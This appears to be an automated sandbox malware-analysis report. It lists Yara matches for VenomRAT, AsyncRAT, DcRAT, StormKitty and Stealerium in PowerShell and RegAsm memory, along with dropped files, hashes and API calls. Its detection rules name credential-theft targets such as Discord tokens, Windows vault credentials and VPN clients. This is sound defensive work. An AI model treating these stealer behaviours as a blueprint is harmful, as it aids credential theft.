Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Yara detected VenomRAT

Source: Yara match	File source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR

Source: C:\Windows\Temp\Package.exe

Code function: 3_2_002090DA OpenClipboard,

3_2_002090DA

Source: C:\Windows\Temp\Package.exe	Code function: 3_2_00203450 GlobalAlloc,GlobalLock,StringFromGUID2,wsprintfW,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_00203450
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_00202EF0 GlobalAlloc,GlobalLock,StringFromGUID2,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		3_2_00202EF0

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.623872a.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.5f3ad0a.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 6.2.powershell.exe.5e16f80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1753216083.0000000004DE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000B.00000002.4110519475.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000006.00000002.1761139997.0000000005E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000006.00000002.1761139997.0000000005939000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: RegAsm.exe PID: 7940, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large strings

Source: 6.2.powershell.exe.4a53f3c.2.raw.unpack, Knvbl.cs	Long String: Length: 14748
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, Knvbl.cs	Long String: Length: 14748
Source: 6.2.powershell.exe.80f0000.10.raw.unpack, Knvbl.cs	Long String: Length: 14748
Source: 6.2.powershell.exe.4dcf5ac.4.raw.unpack, Knvbl.cs	Long String: Length: 14748

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\iviewers.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\Package.exe			Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_02BB3370 NtProtectVirtualMemory,		11_2_02BB3370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_02BB2F19 NtProtectVirtualMemory,		11_2_02BB2F19

Source: C:\Windows\Temp\Package.exe	Code function: 3_2_00209634	3_2_00209634
Source: C:\Windows\Temp\Package.exe	Code function: 3_2_6C4EE135	3_2_6C4EE135
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_02BB27A0	11_2_02BB27A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_02BBF248	11_2_02BBF248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_02BB2792	11_2_02BB2792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_02BB2F19	11_2_02BB2F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06997460	11_2_06997460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06991300	11_2_06991300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_06990040	11_2_06990040

Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\Package.exe A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A
Source: Joe Sandbox View	Dropped File: C:\Windows\Temp\iviewers.dll 9C2838E120C7ED5B582BEDC6177F14A52AA578ADEEA269D0F96FC71A95BD6E68

Source: C:\Windows\Temp\Package.exe	Code function: String function: 0020F3E2 appears 34 times
Source: C:\Windows\Temp\Package.exe	Code function: String function: 6C4E19E0 appears 35 times

Source: C:\Windows\Temp\Package.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7644 -s 204

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.4e51434.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.4e4ced4.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.4de0a2c.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.4e51434.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 6.2.powershell.exe.4c533ce.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 6.2.powershell.exe.5b4acca.9.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
